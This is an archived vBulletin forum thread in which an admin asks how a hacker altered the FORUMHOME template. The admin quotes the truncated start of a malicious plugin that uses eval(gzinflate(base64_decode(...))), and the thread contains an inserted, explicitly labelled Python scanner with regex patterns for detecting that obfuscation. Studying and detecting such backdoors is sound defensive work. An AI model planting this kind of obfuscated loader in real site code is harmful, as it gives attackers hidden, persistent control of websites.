vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Hacker has changed my FORUMHOME template - how? (https://vborg.vbsupport.ru/showthread.php?t=303322)

VBUsers 10-13-2013 01:06 AM

Hacker has changed my FORUMHOME template - how?
 
How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue, but I don't know how he got in or what to change to stop him from doing this. Please help.

hydrocanna.com

ozzy47 10-13-2013 01:10 AM

You sure you cleaned out your site completely after you reported being hacked on Oct 4th?

VBUsers 10-13-2013 01:15 AM

I removed all the plugins that I felt were out of date.

I removed the install folder after upgrading to 4.2.2.

I changed all admin pw and cPanel pw.

What am I missing?

ozzy47 10-13-2013 01:20 AM

Did you follow all the items in the following links thoroughly?

http://www.vbulletin.com/forum/blogs...ve-been-hacked

http://www.vbulletin.com/forum/blogs...vbulletin-site

VBUsers 10-13-2013 01:51 AM

I have for the most part, and I'm trying to go through the files that don't belong on my server, but I'm not sure if I should delete that many files. It's quite a few of 'em. Do I need to look at my plugins next?

How was he able to change the forum home? Are there that many entrances for him to use that we can't narrow it down?

Thank you so much for your help. I've been battling this for months now. It has def killed my community.

Max Taxable 10-13-2013 01:53 AM

Quote:

Originally Posted by VBUsers (Post 2452773)
I have for the most part, and I'm trying to go through the files that don't belong on my server, but I'm not sure if I should delete that many files. It's quite a few of 'em. Do I need to look at my plugins next?

How was he able to change the forum home? Are there that many entrances for him to use that we can't narrow it down?

Thank you so much for your help. I've been battling this for months now. It has def killed my community.

It's not only "narrowed down", it is explained explicitly at the links provided. :D

ozzy47 10-13-2013 01:57 AM

Well I would follow everything in the guides, and then you should be good to go.

There is no way of knowing exactly how the forumhome was changed, but at least reverting it seems to have fixed it.

If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.

VBUsers 10-13-2013 02:05 AM

I found that the hacker got into the admincp and edited a plugin that has this code in it:

Code:

if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {
eval(
gzinflate(base64_decode('...

The plugin has a lot more code that I can't post in here. Is this plugin the hack they keep getting in from? I deleted this a week ago. How is it back?
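
Added example, not part of the original thread and not vBulletin code: a small Python check that flags stored plugin code using the pattern quoted above, `eval()` wrapped around `gzinflate(base64_decode(...))` and gated on the script name. It assumes the plugin code has already been exported as rows with `title`, `hookname` and `phpcode` fields (field names are an assumption); the sample rows and their payload are constructed and harmless.

```python
import re

# Decoder/decompressor calls that are commonly chained inside eval() to hide PHP code.
DECODERS = r"(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)"

RULES = {
    # eval( followed directly by one or more decoder calls, whitespace/newlines allowed
    "eval-of-decoded-data": re.compile(
        r"\beval\s*\(\s*(?:" + DECODERS + r"\s*\(\s*)+", re.I),
    # a quoted literal of 200+ base64-alphabet characters
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/=\s]{200,}['\"]"),
    # code that only runs when a particular script is requested
    "script-name-gate": re.compile(
        r"strpos\s*\(\s*\$_SERVER\s*\[\s*['\"](?:PHP_SELF|SCRIPT_NAME|REQUEST_URI)['\"]\s*\]",
        re.I),
}

def scan_plugin(phpcode):
    """Return the sorted names of the rules that match one plugin's PHP code."""
    return sorted(name for name, rx in RULES.items() if rx.search(phpcode))

def scan_plugins(rows):
    """Return (title, hookname, hits) for rows that eval decoded data or match 2+ rules."""
    findings = []
    for row in rows:
        hits = scan_plugin(row["phpcode"])
        if "eval-of-decoded-data" in hits or len(hits) >= 2:
            findings.append((row["title"], row["hookname"], hits))
    return findings

# Constructed sample rows; the 'A' * 240 payload is a harmless placeholder.
SAMPLE_ROWS = [
    {"title": "Sample A (constructed)", "hookname": "global_start",
     "phpcode": "if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {\neval(\n"
                "gzinflate(base64_decode('" + "A" * 240 + "')));\n}"},
    {"title": "Sample B (constructed)", "hookname": "parse_templates",
     "phpcode": "if (strpos($_SERVER['PHP_SELF'], 'index.php')) { $show['x'] = true; }"},
    {"title": "Sample C (constructed)", "hookname": "global_start",
     "phpcode": "$vbulletin->options['example'] = 1;"},
]

if __name__ == "__main__":
    for title, hook, hits in scan_plugins(SAMPLE_ROWS):
        print(f"{title} [{hook}]: {', '.join(hits)}")
```

A hit is a reason to read the plugin by hand, not proof of compromise; the script-name gate alone (Sample B) is deliberately not reported.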

VBUsers 10-13-2013 02:07 AM

1 Attachment(s)
Here is the screenshot from the log. How does he not have a username?

I blocked the IP but I'm sure that's not a big deal.

CharlieDelta 10-13-2013 02:08 AM

There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc.
Make sure you follow the suggestions to a "T" that Ozzy linked.

